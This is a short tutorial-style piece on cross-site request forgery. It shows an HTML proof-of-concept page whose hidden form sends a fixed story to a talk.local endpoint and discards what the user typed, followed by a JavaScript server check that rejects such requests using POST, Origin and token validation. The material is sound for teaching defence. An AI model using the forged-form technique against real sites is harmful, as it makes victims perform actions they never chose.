XSS is a popular and well-known vulnerability. CSRF is less common but just as dangerous, particularly because of the lack of awareness.
<!doctype html>
<head>
<title>Feels</title>
</head>
<body>
<h1>How are you?</h1>
<textarea></textarea>
<!--
notice how this text area is not a child of the form below.
we don't care about the user's input, it is discarded.
-->
<form action="http://talk.local/create_story">
<input type="hidden" name="my_story" value="i feel very small, please hold me closer..." />
<input type="submit" />
</form>
</body>
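
A server-side check that would reject the submission made by the form above, as an added example that is not code from the original page. The `create_story` handler is not shown on the page, so `checkStoryRequest`, the `csrf_token` field, the session shape and the `http://other.example` origin are assumptions; the form has no `method` attribute, so the browser sends it as a GET, which the first check refuses.

```javascript
// Added example: decide whether a create_story request may change state.
// Hypothetical names throughout; only http://talk.local comes from the page.
const ALLOWED_ORIGIN = "http://talk.local";

// Compare tokens without an early exit on the first differing character.
// (In Node, crypto.timingSafeEqual does the same job on Buffers.)
function tokensMatch(expected, supplied) {
  if (typeof expected !== "string" || typeof supplied !== "string") return false;
  if (expected.length === 0 || expected.length !== supplied.length) return false;
  let diff = 0;
  for (let i = 0; i < expected.length; i++) {
    diff |= expected.charCodeAt(i) ^ supplied.charCodeAt(i);
  }
  return diff === 0;
}

// req: { method, headers (lower-case keys), params }; session: { csrfToken }
function checkStoryRequest(req, session) {
  // 1. State changes never ride on GET, so a plain link or default form fails here.
  if (req.method !== "POST") {
    return { ok: false, reason: "state change requires POST" };
  }
  // 2. If the browser sent an Origin header, it must be our own site.
  const origin = req.headers["origin"];
  if (origin !== undefined && origin !== ALLOWED_ORIGIN) {
    return { ok: false, reason: "cross-origin request" };
  }
  // 3. The per-session token is only readable by pages served from our origin.
  if (!tokensMatch(session.csrfToken, req.params["csrf_token"])) {
    return { ok: false, reason: "missing or wrong CSRF token" };
  }
  return { ok: true, reason: "accepted" };
}

// Constructed sample data (not captured traffic).
const session = { csrfToken: "3f9c1e7a5b2d4c688e0a1b2c3d4e5f60" };
const story = "i feel very small, please hold me closer...";
const samples = {
  forgedGet: { method: "GET", headers: {}, params: { my_story: story } },
  forgedPost: { method: "POST", headers: { origin: "http://other.example" }, params: { my_story: story } },
  noToken: { method: "POST", headers: {}, params: { my_story: story } },
  genuine: { method: "POST", headers: { origin: ALLOWED_ORIGIN },
             params: { my_story: "fine", csrf_token: session.csrfToken } },
};

for (const [name, req] of Object.entries(samples)) {
  console.log(name, checkStoryRequest(req, session));
}
```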